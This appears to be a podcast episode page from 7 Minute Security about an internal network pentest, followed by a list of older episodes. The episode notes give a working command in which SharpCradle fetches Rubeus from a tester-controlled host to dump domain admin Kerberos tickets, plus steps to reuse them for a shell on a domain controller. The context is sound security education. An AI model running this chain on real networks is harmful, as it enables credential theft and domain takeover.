7MS #442: Tales of Internal Network Pentest Pwnage - Part 23
7 Minute Security19 Nov 2020

7MS #442: Tales of Internal Network Pentest Pwnage - Part 23

Hey friends, I dare declare this to be my favorite tale of internal pentest pwnage so far. Why? Because the episode features:

  • Great blue team tools alerting our customer to a lot of the stuff we were doing
  • An EDR that we tried to beat up (but it beat us up instead)
  • SharpGPOAbuse which we talked about extensively last week
  • Separation of "everyday" accounts from privileged accounts
  • Multi-factor authentication bypass!
  • Some delicious findings in GPOs thanks to Ryan Hausec's great two part series (1 and 2). If you're not sure if you're vulnerable to MS14-025, check out this great article which discusses the vulnerability and its mitigation.

The final cherry on top was a new attack another pentester taught me. Use a combination of SharpCradle and Rubeus to steal logged in DA creds:

SharpCradle.exe -w https://your.kali.box.ip/Rubeus.exe dump /service:krbtgt /nowrap

This will give you a TGT (base64 encoded) for active logon sessions to the box. So if a DA is logged in, you can snag their TGT and then convert that into a .kirbi file on your Kali box with:

echo "LooooonnnnnggggggTicketStriiiiiiiiiiinnnngggg" | base64 -d > BobTheDomainAdmin.kirb

Convert the .kirbi file to a .ccache file with ticket converter. Then you can use Impacket tools to use/abuse that access to your heart's delight.

We ended up using Impacket to pop a shell on a DC and add a low-priv account to DA. The interesting thing is that the alert the blue team received essentially said "The DC itself added the user to the DA group" - the alert did not have attribution to the user whose ticket we stole! Good tip for future pentests!

Avsnitt(690)

7MS #58: What Should We Do First? (audio)

7MS #58: What Should We Do First? (audio)

At the end of just about every assessment I deliver, the client asks “What should we do first?” They (understandably) want to know a “top 5″ list of things they should change right away to improve their security posture. Today’s episode explores that a bit. 7MS #58: What Should We Do Next? (audio)

5 Maj 20158min

7MS #57: How to Review a Firewall (audio)

7MS #57: How to Review a Firewall (audio)

In this episode I talk about a few different ways to approach firewall reviews/audits. This document was very helpful in getting my template started. Also check out Nipper if you’re looking for a firewall review/audit tool. 7MS #57: How to Review a Firewall (audio)

30 Apr 20158min

7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

A few offtopic things: What you can expect as far as a podcast release schedule going forward Two suspicious charges that showed up on my credit card while out of town! 7MS #56: OFFTOPIC – Catching Up and Blowing Noses (audio)

28 Apr 20158min

7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

Ok I don’t really have a murse, but I wanted to do a short video(!) podcast to show you some sorta-security-related gadgets that I’ve been nerding out on the last few weeks. 7MS #55: OFFTOPIC – What’s in Brian’s Murse? (video)

22 Apr 20156min

7MS #54: Traveling with a Red Giant (audio)

7MS #54: Traveling with a Red Giant (audio)

If you’re concerned about your credit/debit card security, you might want to give Red Giant a try. It’s a service that provides a debit card you can unlock *only* when buying something. It’s cool. Oh, and Red Giant is NOT sponsoring this episode. If I ever get sponsors, I’ll disclose them clearly. :-) 7MS #54:…

16 Apr 20157min

7MS #53: Are You Ready to Get Robbed? (audio)

7MS #53: Are You Ready to Get Robbed? (audio)

Business DR plans are a hugely important – and often overlooked – piece of the infosec puzzle. But what about at home? If you got run over by a bus tomorrow, would you have good plans in place to help your partner/spouse take over the tech side of your household? That’s what we’re talkin’ about…

14 Apr 20157min

7MS #52: OFFTOPIC – My Son is Really Loyal (audio)

7MS #52: OFFTOPIC – My Son is Really Loyal (audio)

It’s another off-topic episode today. This one’s about how my eight-year-old son is fiercely loyal, and wants to settle a 25-year-old score for me. 7MS #52: OFFTOPIC – My Son is Really Loyal (audio)

9 Apr 20158min

7MS #51: CEH vs. OSCP (audio)

7MS #51: CEH vs. OSCP (audio)

A few people have written in asking whether to pursue the CEH or OSCP (or both). This episode discusses my experience with each cert and hopefully points you in the right direction on which one might be right for you. Here’s the article on CEH I mention during the episode – it has much more…

7 Apr 20157min

Populärt inom Politik & nyheter

svenska-fall
p3-krim
rss-viva-fotboll
rss-krimstad
flashback-forever
fordomspodden
aftonbladet-daily
rss-vad-fan-hande
rss-sanning-konsekvens
olyckan-inifran
svd-dokumentara-berattelser-2
dagens-eko
motiv
rss-frandfors-horna
krimmagasinet
rss-krimreportrarna
svd-nyhetsartiklar
blenda-2
spar
kungligt